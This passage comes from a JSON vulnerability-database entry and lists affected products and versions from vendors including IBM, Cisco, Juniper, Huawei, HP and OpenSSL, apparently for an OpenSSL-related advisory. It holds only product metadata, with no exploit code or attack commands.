"vendor": "debian", "version": "6.0" }, { "model": "system integrated management module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2" }, { "model": "junos 13.1x49-d49", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "uma v200r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "isoc v200r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "3000" }, { "model": "storevirtual 450gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "eupp v100r001c10spc002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.0" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8720" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "junos 13.1r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "oceanstor s5500t v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "junos d20", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "12.1x46" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.30" }, { "model": "storevirtual 450gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "documentum content server p07", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "wag310g wireless-g adsl2+ gateway with voip", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.4" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified wireless ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "29200" }, { "model": "junos d30", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "ida pro", "scope": "eq", "trust": 0.3, "vendor": "hex ray", "version": "6.5" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "prime optical for sps", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.2" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "tivoli monitoring fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.229" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.02007" }, { "model": "junos 12.1r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "documentum content server", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "smart call home", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "junos r3", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "system x3250m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "42511.42" }, { "model": "insight control server deployment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "ecns610 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos 12.3r7", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.2r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "documentum content server sp1", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.31" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8750" }, { "model": "storevirtual china hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "junos 12.3r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "colorqube ps", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "85704.76.0" }, { "model": "junos 13.2r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "oceanstor s6800t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56009.7" }, { "model": "junos d40", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "manageone v100r002c10 spc320", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "svn2200 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 13.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.3" }, { "model": "junos 13.1r4-s2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473011.5" }, { "model": "eupp v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2" }, { "model": "junos 12.1x48-d62", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "uma-db v2r1coospc101", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security information and event management hf6", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.2.2" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.19" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 13.1r4-s3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "usg9300 usg9300 v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "sterling file gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.17" }, { "model": "general parallel file system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600-" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4" }, { "model": "espace u2990 v200r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "svn5500 v200r001c01spc600", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.2" }, { "model": "hardware management console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.0" }, { "model": "tivoli netcool/system service monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "jabber voice for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "idp 4.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.31" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.40" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "junose", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "isoc v200r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "security information and event management", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.22" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.12" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.13" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.16" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.22" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "junos os 13.2r5-s1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "junose", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1.2" }, { "model": "webex messenger service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "junos 13.1r.3-s1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "junos 13.2x52-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "idp series 5.1r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "logcenter v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "junos d25", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "junos 12.1x47-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system enterprise chassis", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7893" }, { "model": "s7700\u0026s9700 v200r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "application networking manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oceanstor s2600t v100r005c30spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "junos 12.1x44-d55", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x45-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "websphere application server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.4" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.17" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.3" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.10" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.10" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "4.1" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "storevirtual 1tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.0" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.11" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.03" }, { "model": "security information and event management ga", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "9.4.0" }, { "model": "junos 11.4r12-s1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.41" }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.2" }, { "model": "tsm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5-1" }, { "model": "usg9500 v300r001c20sph102", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "asa cx context-aware security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified im and presence services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "elog v100r003c01spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "s5900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s6900 v100r005", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "storevirtual 3tb mdl sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "storevirtual fc 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "junos 12.1r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "fusionsphere v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tsm v100r002c07spc219", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3" }, { "model": "system dx360m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "63911.42" }, { "model": "junos r4", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "espace iad v300r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "documentum content server sp1 p28", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.24" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "junos 12.3r6.6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "junos 13.1x50-d15.1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.1x50-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl m", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "junos r7", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.2" }, { "model": "s2750\u0026s5700\u0026s6700 v200r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "hyperdp v200r001c09spc501", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13100" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "junos 12.1x45-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "usg2000 v300r001c10spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "junos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "12.1x44" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "10.0-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.7" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "os/400 v1r4m0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "systems director editions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2" }, { "model": "8.4-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "junos 13.2x51-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.16" }, { "model": "svn5500 v200r001c01hp0001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tivoli monitoring fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.235" }, { "model": "junos 13.2x51-d40", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli monitoring fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.302" }, { "model": "agent desktop for cisco unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oceanstor s5500t v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace iad v300r001c07", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.5" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "junos 13.2r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "documentum content server sp2 p16", "scope": "ne", "trust": 0.3, "vendor": "emc", "version": "6.7" }, { "model": "junos 12.1x44-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "junos 13.2x51-d25.2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "system x3550m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79441.42" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 1tb mdl china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "junos os 13.1r4-s3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, 